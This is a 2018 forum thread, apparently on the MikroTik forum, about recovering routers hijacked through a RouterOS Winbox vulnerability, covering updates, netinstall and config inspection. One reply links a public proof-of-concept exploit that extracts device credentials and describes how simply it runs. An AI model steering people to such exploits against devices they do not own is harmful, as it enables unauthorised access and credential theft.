URGENT security reminder

FranchBG · October 13, 2018, 12:55pm

Update for sure!!!

mdragons · October 13, 2018, 1:29pm

We should have automatic security updates. Security updates are different than feature upgrades and for mission critical devices such as routers, security updates should be included.

schadom · October 13, 2018, 2:09pm

Automatic security upgrades can ONLY be implemented, if they can be disabled. Opt-out MUST be possible.

Sob · October 13, 2018, 3:19pm

But officially supported automatic updates would need bigger changes, current release channels are not perfect for this. The “stable” (previously “current”) is out, because it breaks things every now and then. When it happens to few early adopters, it’s not good, but imagine thousands routers all over the world breaking up, it would be some bad publicity. The “long term” (previously “bugfix”) is better, but not completely safe either. Upgrades from a.b.C to a.b.D should be ok, but a.B.x to a.C.x bring bigger changes and something can go wrong (e.g. current bridge/switch changes don’t seem to work for all people).

To make it as safe as possible, there would have to be some “microupdates” with only minimal changes, strictly security-only. But MikroTik can hardly provide them for every version they release.

usmany · October 15, 2018, 1:28pm

Hi All,

I updated my Router OS from v6.41. to v643.2, updated winbox to current version, updated admin password, still the hacker was able to get full control of the system locking me out.

What’s the way out again?

Thank you

mkx · October 15, 2018, 2:31pm

It is highly probable that attacker installed some stealth script which allows her to regain control. The only way out is to netinstall router (during that process router’s NAND storage is formatted) and then configure router from scratch. It is vital not to use backup to restore configuration, text export can be handy when configuring … but be careful not to copy any configuration bit for which you’re not sure why it’s there.

usmany · October 15, 2018, 2:38pm

Ok! that is cool. I have a backup copy of /export file, I will reload script from scratch for security measure.

Thank

mkx · October 15, 2018, 2:49pm

Before loading exported configuration do inspect it in case it contains something suspicious.

usmany · October 15, 2018, 3:14pm

Sure! i will check it well.

Thanks

usmany · October 16, 2018, 2:33pm

Hi All,

I have question regards winbox connection mode; is it highly secure or not at all? ssh or telnet connection?

if we say winbox connection is ssh, why i see this in my box, see attached file
telnet or ssh..JPG

pcunite · October 16, 2018, 2:37pm

After you’ve connected with Winbox, and then click on “New Terminal”, you’ll see user logged in via telnet messages.

usmany · October 16, 2018, 6:29pm

yes, i saw it. what does that mean? ssh or telnet connection via winbox?

normis · October 17, 2018, 7:11am

Yes, this is what it means

Smithpoh · October 18, 2018, 4:16am

Thanks for the link.

mauro1108 · October 19, 2018, 8:07am

hi, we have hundreds of mikrotik cpe with public static ip; fortunately, only a few of them (5) have a ros version afflicted by the vulnerability; they came from the factory with ros 6.40.3 , and a few hours from installation, someone use the vulnerability to change the password and lock us out. In our configuration, we also have a scheduled script that grabs the configuration from one of our servers once a day, but they disable it too…; so my question is, are there any way to bring back the control of these cpes remotely, or the only way to do it is locally with netinstall?

normis · October 19, 2018, 8:10am

if your user account has been disabled, then Netinstall is the only option.
however, most popular attacks leave the user account open, so try to log in from the local network side.

mauro1108 · October 19, 2018, 9:57am

probably they changed the admin password, or they disabled the “admin” user…; i receive a “invalid username or password” during login attempts…;

vecernik87 · October 19, 2018, 10:04am

If it is old RouterOS and you get “bad password” it means you have access to vulnerable winbox service.
All you need to do is try the Proof of Concept: https://github.com/BasuCert/WinboxPoC It is really simple to use, all you need is python3 installed and IP/MAC of the device.
Someone hacked your device? Hack it back for yourself!

mauro1108 · October 19, 2018, 4:24pm

the Ros version is 6.40.3; i was able to run the Proof of Concept successfully, but the obtained credentials still not work… :-/

EDIT: it works! the have limited the login of the users only to certain ip, but mac telnet is my friend thanks a lot!!!

Max2 · October 20, 2018, 5:40pm

I’ve been exposed to this vulnerability until last week. I had the impression that I had the WinBox port closed for WAN. The ISP’s CGNAT rollout without any notification mislead me into thinking that my ports were closed when being scanned from the internet.

I’ve updated the software, but I’m a bit paranoia. How can I make sure that the router’s software/firmware/etc hasn’t been tampered in any way while I was vulnerable, and that there’s backdoor still left opened?